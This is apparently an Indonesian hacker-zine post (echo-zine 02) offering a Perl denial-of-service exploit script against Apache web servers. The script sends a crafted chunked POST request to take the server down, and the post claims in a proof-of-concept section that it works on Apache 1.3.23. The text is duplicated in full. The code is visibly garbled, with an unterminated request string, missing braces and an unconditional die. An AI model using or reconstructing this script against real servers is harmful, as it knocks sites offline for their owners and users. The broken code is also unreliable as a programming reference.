echo-zine 02
Oleh: y3dips (echo-staff) ||
#!/usr/bin/perl -w
use IO::Socket;
print " * *\n";
print " * D.O.S buat apache webserver 1.2.X < .26 && 2.0.X *\n";
print " * based on <Luis Wong> lwong [at] *\n";
print " *modified && tested by y3dips on apache 1.3.23, y3dips [at]*\n";
print " * greetz to echostaff a.k.a the_day, moby, comex *\n";
print " * echo-memberz, newbie_hacker, puji_tiwili* *\n";
print " * *\n";
printf" ***********************************************************************\n\n";
if(@ARGV == 1){
my $host = $ARGV[0];
my $i;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto => 'tcp');
die " GAk bisa terhubung a.k.a GAk bisa !.";
print $sock "POST /eCHo.htm HTTP/1.1\nHost: $host\nTransfer-Encoding:
while ( <$sock> ){
close $sock;
print ".";
print " [GUnakan] ... ./$0 'HosT' << untuk linux \n" ;
print " [Gunakan] ... perl $0 'Host' <<untuk windows \n";
proof of concept:
aku mencoba membuktikannya pada server apache 1.3.23, (PHP TRIAD version 2.2)
baik menjalankan exsploit dari windows ataupun linux... *IT WORKS!
apabila berhasil maka akan membuat server down dikarenakan eksekusi file echo.
htm dengan metode post.
pada pengirim akan terlihat "...... yang terus berjalan" >> untuk menghentikan
tekan ctrl+c
sedang pada target mengakibatkan pengaksesan halaman web akan menampilkan:
The page cannot be displayed
The page you are looking for is currently unavailable. The Web site might be
experiencing technical difficulties, or you may need to adjust your browser
Cannot find server or DNS Error
Internet Explorer
sampai kita menghentikan program [ dg Ctrl+c ]
kode berdasarkan : based on <Luis Wong> lwong [at]
*greetz to: [ echostaff a.k.a moby, the_day, comex ] puji_tiwili*
pak onno, pak Larry wall (atas perlnya), pak linus,
pak eric s. Raymond, pak RM. stallman,anak2 newbie_hacker
$peci@l temen2 penggemar opensource
"aku mengacu pada orang terdahulu, semoga orang sesudahku mengacu kepadaku"
opensource = beforex + x + afterx
aku hanya copy paste adja ...
Oleh: y3dips (echo-staff) ||
#!/usr/bin/perl -w
use IO::Socket;
print " * *\n";
print " * D.O.S buat apache webserver 1.2.X < .26 && 2.0.X *\n";
print " * based on <Luis Wong> lwong [at] *\n";
print " *modified && tested by y3dips on apache 1.3.23, y3dips [at]*\n";
print " * greetz to echostaff a.k.a the_day, moby, comex *\n";
print " * echo-memberz, newbie_hacker, puji_tiwili* *\n";
print " * *\n";
printf" ***********************************************************************\n\n";
if(@ARGV == 1){
my $host = $ARGV[0];
my $i;
$sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => "80",
Proto => 'tcp');
die " GAk bisa terhubung a.k.a GAk bisa !.";
print $sock "POST /eCHo.htm HTTP/1.1\nHost: $host\nTransfer-Encoding:
while ( <$sock> ){
close $sock;
print ".";
print " [GUnakan] ... ./$0 'HosT' << untuk linux \n" ;
print " [Gunakan] ... perl $0 'Host' <<untuk windows \n";
proof of concept:
aku mencoba membuktikannya pada server apache 1.3.23, (PHP TRIAD version 2.2)
baik menjalankan exsploit dari windows ataupun linux... *IT WORKS!
apabila berhasil maka akan membuat server down dikarenakan eksekusi file echo.
htm dengan metode post.
pada pengirim akan terlihat "...... yang terus berjalan" >> untuk menghentikan
tekan ctrl+c
sedang pada target mengakibatkan pengaksesan halaman web akan menampilkan:
The page cannot be displayed
The page you are looking for is currently unavailable. The Web site might be
experiencing technical difficulties, or you may need to adjust your browser
Cannot find server or DNS Error
Internet Explorer
sampai kita menghentikan program [ dg Ctrl+c ]
kode berdasarkan : based on <Luis Wong> lwong [at]
*greetz to: [ echostaff a.k.a moby, the_day, comex ] puji_tiwili*
pak onno, pak Larry wall (atas perlnya), pak linus,
pak eric s. Raymond, pak RM. stallman,anak2 newbie_hacker
$peci@l temen2 penggemar opensource
"aku mengacu pada orang terdahulu, semoga orang sesudahku mengacu kepadaku"
opensource = beforex + x + afterx
aku hanya copy paste adja ...
Reviewed by Unknown
4:08 AM
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